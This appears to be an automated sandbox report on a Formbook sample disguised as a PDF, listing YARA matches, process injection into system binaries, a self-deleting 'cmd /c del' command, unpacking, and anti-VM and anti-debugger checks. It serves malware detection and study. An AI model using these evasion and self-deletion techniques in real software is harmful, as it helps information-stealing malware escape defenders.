          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE20A03_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B820A83_2_00B820A8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ACB0903_2_00ACB090
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B828EC3_2_00B828EC
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B710023_2_00B71002
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AD41203_2_00AD4120
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ABF9003_2_00ABF900
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B822AE3_2_00B822AE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEEBB03_2_00AEEBB0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B7DBD23_2_00B7DBD2
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B82B283_2_00B82B28
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AC841F3_2_00AC841F
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B7D4663_2_00B7D466
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE25813_2_00AE2581
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00ACD5E03_2_00ACD5E0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B825DD3_2_00B825DD
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AB0D203_2_00AB0D20
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B82D073_2_00B82D07
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B81D553_2_00B81D55
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B82EF73_2_00B82EF7
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AD6E303_2_00AD6E30
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B81FF13_2_00B81FF1
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_004010303_1_00401030
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041C24C3_1_0041C24C
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041CB403_1_0041CB40
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_00408C4C3_1_00408C4C
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_00408C503_1_00408C50
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041C4AE3_1_0041C4AE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_00402D903_1_00402D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0338EBB08_2_0338EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03376E308_2_03376E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03350D208_2_03350D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03421D558_2_03421D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033741208_2_03374120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0335F9008_2_0335F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_034110028_2_03411002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0336B0908_2_0336B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AACB408_2_00AACB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AAC4AE8_2_00AAC4AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00A98C4C8_2_00A98C4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00A98C508_2_00A98C50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00A92D908_2_00A92D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00A92FB08_2_00A92FB0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: String function: 0041A090 appears 38 times
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: String function: 00ABB150 appears 35 times
          Source: MV Sky Marine_pdf.exeStatic PE information: Resource name: RT_VERSION type: PDP-11 pure executable not stripped
          Source: MV Sky Marine_pdf.exe, 00000002.00000003.228681580.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV Sky Marine_pdf.exe
          Source: MV Sky Marine_pdf.exe, 00000003.00000002.275956738.0000000000D3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV Sky Marine_pdf.exe
          Source: MV Sky Marine_pdf.exe, 00000003.00000002.275709400.0000000000A52000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs MV Sky Marine_pdf.exe
          Source: MV Sky Marine_pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.MV Sky Marine_pdf.exe.2670000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MV Sky Marine_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@15/9
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040441E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_0040441E
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_10004347 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,2_2_10004347
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_00402053 CoCreateInstance,MultiByteToWideChar,2_2_00402053
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_01
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nssBDFC.tmpJump to behavior
          Source: MV Sky Marine_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: MV Sky Marine_pdf.exeVirustotal: Detection: 33%
          Source: MV Sky Marine_pdf.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeFile read: C:\Users\user\Desktop\MV Sky Marine_pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeProcess created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeProcess created: C:\Users\user\Desktop\MV Sky Marine_pdf.exe 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'Jump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: MV Sky Marine_pdf.exe, 00000002.00000003.231397905.0000000002D30000.00000004.00000001.sdmp, MV Sky Marine_pdf.exe, 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MV Sky Marine_pdf.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: MV Sky Marine_pdf.exe, 00000003.00000002.275693776.0000000000A40000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeUnpacked PE file: 3.2.MV Sky Marine_pdf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00416091 pushfd ; ret 3_2_00416096
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041617D push esi; retf 3_2_00416188
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0040DACD push edx; retf 3_2_0040DACE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041B3F2 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041B3FB push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041B3A5 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_0041B45C push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_004037A9 push cs; ret 3_2_004037AC
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_00416091 pushfd ; ret 3_1_00416096
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041617D push esi; retf 3_1_00416188
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0040DACD push edx; retf 3_1_0040DACE
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041B3F2 push eax; ret 3_1_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041B3FB push eax; ret 3_1_0041B462
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041B3A5 push eax; ret 3_1_0041B3F8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_1_0041B45C push eax; ret 3_1_0041B462
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_033AD0D1 push ecx; ret 8_2_033AD0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AA6091 pushfd ; ret 8_2_00AA6096
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AAC0E3 push eax; retf 8_2_00AAC0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AA617D push esi; retf 8_2_00AA6188
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00A9DACD push edx; retf 8_2_00A9DACE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AAB3A5 push eax; ret 8_2_00AAB3F8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AAB3FB push eax; ret 8_2_00AAB462
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AAB3F2 push eax; ret 8_2_00AAB3F8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AAC360 push es; iretd 8_2_00AAC362
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00AAB45C push eax; ret 8_2_00AAB462
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_00A937A9 push cs; ret 8_2_00A937AC
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dllJump to dropped file
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000A985E4 second address: 0000000000A985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000A9896E second address: 0000000000A98974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_004088A0 rdtsc 3_2_004088A0
          Source: C:\Windows\explorer.exe TID: 6292Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6208Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_00405649 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00405649
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_0040601F FindFirstFileA,FindClose,2_2_0040601F
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_00402671 FindFirstFileA,2_2_00402671
          Source: explorer.exe, 00000004.00000000.255100372.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.241818269.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.238635954.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.255142797.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000002.508709868.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.255142797.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.253312981.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_004088A0 rdtsc 3_2_004088A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00409B10 LdrLoadDll,3_2_00409B10
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_100047B8 mov eax, dword ptr fs:[00000030h]2_2_100047B8
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 2_2_100049BB mov eax, dword ptr fs:[00000030h]2_2_100049BB
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h]3_2_00AF90AF
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\Desktop\MV Sky Marine_pdf.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]3_2_00AEF0BF
